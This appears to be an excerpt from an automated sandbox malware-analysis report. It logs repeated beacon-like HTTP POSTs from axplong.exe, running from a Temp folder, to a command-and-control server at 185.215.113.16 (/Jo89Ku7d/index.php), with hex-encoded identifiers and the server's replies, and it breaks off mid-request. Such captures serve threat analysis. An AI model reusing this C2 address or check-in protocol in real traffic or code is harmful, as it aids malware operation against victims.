                                                                                                                                                                Sep 27, 2024 17:42:36.327580929 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:36 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:36.345884085 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:36.586858988 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:36 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                27192.168.2.449809185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:36.697875023 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:37.483922005 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:37 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:37.484781981 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:37.731792927 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:37 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                28192.168.2.449812185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:37.858397961 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:38.553558111 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:38 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:38.570581913 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:38.802301884 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:38 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                29192.168.2.449814185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:38.932248116 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:39.675354004 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:39 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:39.684696913 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:39.907602072 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:39 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                30192.168.2.449817185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:40.078653097 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:40.803431988 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:40 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:40.805481911 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:41.035911083 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:40 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                31192.168.2.449819185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:41.153410912 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:41.931767941 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:41 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:41.932569027 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:42.164429903 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:42 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                32192.168.2.449821185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:42.306612015 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:43.047832966 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:42 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:43.069158077 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:43.312967062 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:43 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                33192.168.2.449823185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:43.517040014 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:44.228558064 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:44 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:44.248790979 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:44.483057022 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:44 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                34192.168.2.449824185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:44.644453049 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:45.341553926 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:45 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:45.360764980 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:45.584373951 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:45 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                35192.168.2.449826185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:45.709882975 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:46.427062988 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:46 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:46.474534988 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:46.704027891 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:46 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                36192.168.2.449827185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:46.824382067 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
